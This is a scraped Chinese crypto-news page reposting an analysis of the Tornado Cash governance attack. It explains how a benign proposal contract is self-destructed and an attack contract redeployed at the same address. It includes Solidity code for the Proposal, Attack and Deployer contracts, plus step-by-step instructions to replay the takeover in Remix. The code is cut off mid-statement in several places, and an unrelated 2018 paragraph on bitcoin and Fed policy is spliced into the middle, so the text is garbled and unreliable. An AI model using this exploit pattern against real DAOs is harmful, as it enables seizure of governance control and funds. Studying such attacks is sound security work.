月亮链 月亮链
Ctrl+D收藏月亮链
首页 > AVAX > 正文

BSP:解析Tornado治理攻击:如何同一个地址上部署不同的合约_BSP价格

作者:

时间:1900/1/1 0:00:00

大概两周前(5 月 20 日),知名混币协议 Tornado Cash 遭受到治理攻击,黑客获取到了Tornado Cash的治理合约的控制权(Owner)。

攻击过程是这样的:攻击者先提交了一个“看起来正常”的提案, 待提案通过之后, 销毁了提案要执行的合约地址, 并在该地址上重新创建了一个攻击合约。

攻击过程可以查看 SharkTeam 的  Tornado

   address public owner = msg

   function execute(uint256 proposalId) external payable {        Proposal storage proposal = proposals[proposalId];        require(proposal

}contract Proposal {    event Log(string message);    function executeProposal() external {        emit Log("Excuted code approved by DAO");    }    function emergencyStop() external {        selfdestruct(payable(address(0)));    }}contract Attack {    event Log(string message);    address public owner;    function executeProposal() external {        emit Log("Excuted code not approved by DAO :)");        // For example - set DAO's owner to attacker        owner = msg

}contract DeployerDeployer {    event Log(address addr);    function deploy() external {        bytes32 salt = keccak256(abi

}contract Deployer {    event Log(address addr);    function deployProposal() external {        address addr = address(new Proposal());        emit Log(addr);    }    function deployAttack() external {        address addr = address(new Attack());        emit Log(addr);    }    function kill() external {        selfdestruct(payable(address(0)));    }}大家可以使用该代码自己在 Remix 中演练一下。

前美联储理事Kevin Warsh:从美国经济政策角度解析比特币价格波动: 前美联储理事、斯坦福大学胡佛研究所杰出访问学者Kevin Warsh今日撰文,从政府经济政策角度解读了比特币价格波动的原因。对于2017年BTC价格的狂飙,Warsh认为:1.特朗普上台后推出的减税等宽松政策持续刺激美国经济增长,继而带来的通货膨胀预期促使美国加息进度超预期,比特币成为规避法币贬值的避风港;2.特朗普政府贸易保护政策致使美元在2017年贬值12%,投资者寻求比特币规避贬值;3.据去年10月、11月调查,美国民众对政府的信任度下降14个百分点达到33%,而美元正是建立在公众对政府信任的基础上。而对于今年以来比特币价格的大幅波动,是因为投资者正在调整对政府政策的预期,新任美联储主席也在重新考虑如何更好地实施货币政策,同时也在考虑推出自己的加密货币。[2018/3/8]

首先部署 DeployerDeployer , 调用 DeployerDeployer.deploy() 部署 Deployer , 然后调用   Deployer.deployProposal()  部署  Proposal 。

拿到 Proposal 提案合约地址后, 向  DAO 发起提案。

分别调用 Deployer.kill 和  Proposal.emergencyStop 销毁掉 Deployer 和 Proposal

再次调用 DeployerDeployer.deploy() 部署 Deployer , 调用 Deployer.deployAttack() 部署  Attack ,    Attack  将和之前的   Proposal 一致。

执行 DAO.execute 时,攻击完成 获取到了 DAO 的 Owner 权限。

区块律动BlockBeats

曼昆区块链法律

Foresight News

GWEI Research

吴说区块链

西柚yoga

ETH中文

金色早8点

金色财经 子木

ABCDE

0xAyA

标签:BSPNBSPROSALBSP价格nbs币最新消息bitopro交易所SALE

AVAX热门资讯
区块链:全链游戏面面观:空中楼阁还是沙漠绿洲_SHRADAR币

在加密世界中,GameFi 正经历低谷,人们对其关注度有所减少。然而,近期全链游戏的概念开始引起更多关注和讨论,似乎带来了一丝新生.

1900/1/1 0:00:00
CEL:Cellframe Network 因闪电贷操控池子比例遭受攻击事件分析_BNB

根据 Numen 链上监控,2023年6月1日10点7分55秒(UTC+8),Cellframe Network(/img/202364115846/0.jpg" />2.需要注意的是.

1900/1/1 0:00:00
SAT:全面解析.sats域名_SATS

作者:SevaFTW,加密KOL;翻译:金色财经xiaozou你错过了Ordinals,又错过了BRC-20,但千万不要错过下一个比特币大事件.

1900/1/1 0:00:00
DIG:删除官网加密货币表述 进军 AI Paradigm 范式转移为哪般?_PARA

出品:深潮 TechFlow  撰文:0xmin如果要问加密货币领域最厉害的VC有哪些,Paradigm 一定榜上有名,熊市All in 比特币,深度孵化Uniswap一战成名.

1900/1/1 0:00:00
区块链:科学家提出区块链的量子工作量证明共识_什么是比特币工厂

作者:TRISTAN GREENE,Cointelegraph;编译:松雪,金色财经来自澳大利亚和美国的大学的一组研究人员与量子技术公司 BTQ 进行合作,最近发表了一项研究.

1900/1/1 0:00:00
NAN:福布斯:60 天内流失 120 亿美元 币安 FUD 比想象中更严重_binance

来源:福布斯编译:比推BitpushNews Mary Liu全球最大的加密货币交易所币安(Binance)正在努力保住资产.

1900/1/1 0:00:00